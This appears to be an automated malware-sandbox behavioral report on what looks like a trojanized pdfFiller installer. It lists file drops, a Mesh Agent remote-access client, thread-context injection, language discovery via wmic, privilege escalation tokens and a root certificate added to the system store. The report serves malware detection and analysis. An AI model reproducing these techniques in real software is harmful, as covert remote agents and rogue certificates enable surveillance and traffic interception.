File opened for modification C:\Windows\SysWOW64\dll\wwin32u.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4408 set thread context of 460 N/A C:\Users\Admin\AppData\Local\Temp\68b6811b97ee6130c2cc4fcf36991e6a C:\Users\Admin\AppData\Local\Temp\68b6811b97ee6130c2cc4fcf36991e6a

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\pdfFiller\System.Runtime.CompilerServices.Unsafe.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\System.Text.Encodings.Web.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\System.Text.Json.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-PIPL7.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-4Q8KH.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-DHKA7.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-P6BNA.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-K4DUM.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Program Files (x86)\pdfFiller\MaterialDesignColors.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\pdfFiller.exe C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-8QM25.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-IHDLM.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-GMART.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\Microsoft.Web.WebView2.WinForms.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\System.Buffers.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\WebView2Loader.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-04S7L.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Program Files (x86)\pdfFiller\Griffin.Core.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\Newtonsoft.Json.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-L1BUO.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-JNBRG.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-KM3E6.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-UH6G0.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-H4Q2J.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Program Files (x86)\pdfFiller\System.Threading.Tasks.Extensions.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\Castle.Core.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\Microsoft.Bcl.AsyncInterfaces.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\Microsoft.Web.WebView2.Core.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-0IA04.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Program Files (x86)\pdfFiller\System.Reactive.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\SimpleInjector.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-A28P1.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-PF901.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-HI499.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\microsoft.management.infrastructure.native.unmanaged.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-RHM6Q.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\Mesh Agent\MeshAgent.msh C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File created C:\Program Files (x86)\pdfFiller\is-EE5NT.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\Mesh Agent\MeshAgent.db C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Program Files (x86)\pdfFiller\AutoUpdater.NET.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\Microsoft.Web.WebView2.Wpf.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-BOTLD.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-5SGGM.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-QG5OD.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File created C:\Program Files (x86)\pdfFiller\is-DD299.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-49S4A.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-GNE12.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\Refit.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\System.Memory.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\System.Numerics.Vectors.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-S7I31.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-2AGIG.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\meshagent32-mesh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\68b6811b97ee6130c2cc4fcf36991e6a N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\more.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Install(4).exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\more.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133733455051339586" C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.pdf\OpenWithProgids\pdfFillerFile.pdf C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.doc\OpenWithProgids\pdfFillerFile.doc C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ppt\OpenWithProgids\pdfFillerFile.ppt C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\pdffiller C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\pdffiller C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.docx\OpenWithProgids\pdfFillerFile.docx C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.pptx\OpenWithProgids\pdfFillerFile.pptx C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.txt\OpenWithProgids\pdfFillerFile.txt C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\.jpeg\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pdffiller\ = "URL:pdfFiller Protocol" C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\pdffiller\shell\open\command C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\.doc\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\.docx\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pdffiller\Url Protocol C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\.txt\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\.png\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\pdffiller\shell C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pdffiller\shell\open\command\ = "\"C:\\Program Files (x86)\\pdfFiller\\pdfFiller.exe\" \"%1\"" C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\.ppt\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.jpeg\OpenWithProgids\pdfFillerFile.jpeg C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pdffiller\DefaultIcon\ = "C:\\Program Files (x86)\\pdfFiller\\pdfFiller.exe,0" C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\pdffiller\shell\open\command C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.png\OpenWithProgids\pdfFillerFile.png C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\.pdf\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\.pptx\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.jpg\OpenWithProgids\pdfFillerFile.jpg C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\pdffiller\shell\open C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\.jpg\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\pdffiller\DefaultIcon C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8CF427FD790C3AD166068DE81E57EFBB932272D4 C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8CF427FD790C3AD166068DE81E57EFBB932272D4\Blob = [certificate blob omitted] C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
